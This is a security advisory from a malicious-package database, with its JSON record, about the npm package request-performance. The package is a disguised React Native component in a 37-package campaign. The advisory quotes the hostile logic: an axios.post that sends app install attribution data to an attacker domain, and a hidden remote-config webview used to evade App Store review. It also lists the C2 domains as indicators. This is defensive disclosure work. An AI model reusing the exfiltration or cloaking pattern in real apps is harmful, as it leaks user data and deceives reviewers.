MAL-2026-6175
Vulnerability from ossf_malicious_packages
Published
2026-06-17 12:00
Modified
2026-06-17 12:00
Summary
Malicious code in request-performance (npm)
Details

The npm package request-performance (published by npm user sproger, slavatopbuyer@gmail.com) is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains (surrprisingcoompanny.lol and barbellmate.xyz). On component mount it registers appsFlyer.onInstallConversionData and exfiltrates the app's install/conversion attribution data via axios.post("https://surrprisingcoompanny.lol", data), fetches a remote-config URL, and renders it full-screen in a react-native-webview that is hidden (display:'none') unless the server returns a valid URL — i.e. App Store review-evasion / attribution-laundering ('cloaking'). The package name is a decoy unrelated to its actual function, and the real logic is concealed behind junk 'calculator' functions with Ukrainian-language comments. Indicators of compromise: C2 surrprisingcoompanny.lol, barbellmate.xyz; npm author sproger. Both C2 domains are currently unregistered (dangling-C2 takeover risk for any app still shipping these packages). Reproducible from the published tarball, e.g. socket-network@1.0.0 SocketComponent*.jsx: appsFlyer.onInstallConversionData(...) -> axios.post("https://surrprisingcoompanny.lol", data); axios.get(fLink) remote config; hidden gated on display:'none'/'flex'.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits
WestBayBerry / dependency-guardian westbayberry.com github.com/ComCat1
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ]
      },
      "package": {
        "ecosystem": "npm",
        "name": "request-performance"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "versions": [
        "1.0.0"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "https://westbayberry.com",
        "https://github.com/ComCat1"
      ],
      "name": "WestBayBerry / dependency-guardian",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "iocs": {
      "domains": [
        "surrprisingcoompanny.lol",
        "barbellmate.xyz"
      ]
    },
    "malicious-packages-origins": null
  },
  "details": "The npm package `request-performance` (published by npm user `sproger`, slavatopbuyer@gmail.com) is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains (surrprisingcoompanny.lol and barbellmate.xyz). On component mount it registers `appsFlyer.onInstallConversionData` and exfiltrates the app\u0027s install/conversion attribution data via `axios.post(\"https://surrprisingcoompanny.lol\", data)`, fetches a remote-config URL, and renders it full-screen in a `react-native-webview` that is hidden (display:\u0027none\u0027) unless the server returns a valid URL \u2014 i.e. App Store review-evasion / attribution-laundering (\u0027cloaking\u0027). The package name is a decoy unrelated to its actual function, and the real logic is concealed behind junk \u0027calculator\u0027 functions with Ukrainian-language comments. Indicators of compromise: C2 surrprisingcoompanny.lol, barbellmate.xyz; npm author `sproger`. Both C2 domains are currently unregistered (dangling-C2 takeover risk for any app still shipping these packages). Reproducible from the published tarball, e.g. socket-network@1.0.0 SocketComponent*.jsx: appsFlyer.onInstallConversionData(...) -\u003e axios.post(\"https://surrprisingcoompanny.lol\", data); axios.get(fLink) remote config; hidden \u003cWebView source={{uri: techResult}}\u003e gated on display:\u0027none\u0027/\u0027flex\u0027.",
  "id": "MAL-2026-6175",
  "modified": "2026-06-17T12:00:00Z",
  "published": "2026-06-17T12:00:00Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/request-performance"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in request-performance (npm)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.